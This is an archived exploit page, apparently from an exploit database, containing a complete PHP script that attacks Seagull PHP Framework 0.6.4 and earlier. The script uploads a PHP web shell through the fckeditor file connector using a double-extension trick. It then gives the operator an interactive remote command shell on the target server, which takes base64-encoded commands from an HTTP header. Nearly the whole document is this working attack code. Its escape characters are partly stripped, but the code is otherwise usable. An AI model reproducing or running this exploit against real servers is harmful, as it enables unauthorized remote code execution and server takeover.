Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit
# Published : 2008-06-26
# Author : EgiX
# Previous Title : Galmeta Post CMS 0.2 Multiple Local File Inclusion Vulnerabilities
# Next Title : Riddles Complete Website 1.2.1 (riddleid) SQL Injection Vulnerability
<?php

/*
	------------------------------------------------------------------------
	Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit
	------------------------------------------------------------------------
	
	author...: EgiX
	mail.....: n0b0d13s[at]gmail[dot]com
	
	link.....: http://seagullproject.org/
	details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)

	[-] vulnerable code in /www/tinyfck/filemanager/connectors/php/config.php
	
	33.	// SECURITY: You must explicitelly enable this "connector". (Set it to "true").
	34.	$Config['Enabled'] = true ;
	35.	
	36.	// Path to user files relative to the document root.
	37.	$Config['UserFilesPath'] = SGL_BASE_URL . '/images/' ;
	38.	
	39.	// Fill the following value it you prefer to specify the absolute path for the
	40.	// user files directory. Usefull if you are using a virtual directory, symbolic
	41.	// link or alias. Examples: 'C:\MySite\UserFiles\' or '/root/mysite/UserFiles/'.
	42.	// Attention: The above 'UserFilesPath' must point to the same directory.
	43.	$Config['UserFilesAbsolutePath'] = SGL_WEB_ROOT.'/images/';
	44.	
	45.	$Config['AllowedExtensions']['File']    = array() ;
	46.	$Config['DeniedExtensions']['File']     = array('php','php3','php5','phtml','asp','aspx','ascx','jsp','cfm', [...]
	47.	
	48.	$Config['AllowedExtensions']['Image']   = array('jpg','gif','jpeg','png') ;
	49.	$Config['DeniedExtensions']['Image']    = array() ;
	50.	
	51.	$Config['AllowedExtensions']['Flash']   = array('swf','fla') ;
	52.	$Config['DeniedExtensions']['Flash']    = array() ;
	53.	
	54.	$Config['AllowedExtensions']['Media']   = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
	55.	$Config['DeniedExtensions']['Media']    = array() ;
	
	with a default configuration of this script, an attacker might be able to upload arbitrary
	files containing malicious PHP code due to multiple file extensions isn't properly checked
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

define(STDIN, fopen("php://stdin", "r"));

function http_send($host, $packet)
{
	$sock = fsockopen($host, 80);
	while (!$sock)
	{
		print "n[-] No response from {$host}:80 Trying again...";
		$sock = fsockopen($host, 80);
	}
	fputs($sock, $packet);
	while (!feof($sock)) $resp .= fread($sock, 1024);
	fclose($sock);
	return $resp;
}

print "n+--------------------------------------------------------------------+";
print "n| Seagull <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
print "n+--------------------------------------------------------------------+n";

if ($argc < 3)
{
	print "nUsage......: php $argv[0] host pathn";
	print "nExample....: php $argv[0] localhost /";
	print "nExample....: php $argv[0] localhost /seagull/n";
	die();
}

$host = $argv[1];
$path = $argv[2];

$filename  = md5(time()).".php.php4";
$connector = "tinyfck/filemanager/connectors/php/connector.php";

$payload  = "--o0oOo0orn";
$payload .= "Content-Disposition: form-data; name="NewFile"; filename="{$filename}"rnrn";
$payload .= "<?php ${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${print(_code_)} ?>rn";
$payload .= "--o0oOo0o--rn";

$packet  = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0rn";
$packet .= "Host: {$host}rn";
$packet .= "Content-Length: ".strlen($payload)."rn";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0orn";
$packet .= "Connection: closernrn";
$packet .= $payload;

preg_match("/OnUploadCompleted((.*),"(.*)")/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("n[-] Upload failed! (Error {$html[1]})n");

while(1)
{
	print "nseagull-shell# ";
	$cmd = trim(fgets(STDIN));
	if ($cmd != "exit")
	{
		$packet = "GET {$path}images/File/{$html[2]} HTTP/1.0rn";
		$packet.= "Host: {$host}rn";
		$packet.= "Cmd: ".base64_encode($cmd)."rn";
		$packet.= "Connection: closernrn";
		$output = http_send($host, $packet);
		if (!preg_match("/_code_/", $output)) die("n[-] Exploit failed...n");
		$shell  = explode("_code_", $output);
		print "n{$shell[1]}";
	}
	else break;
}

?>

# www.Syue.com [2008-06-26]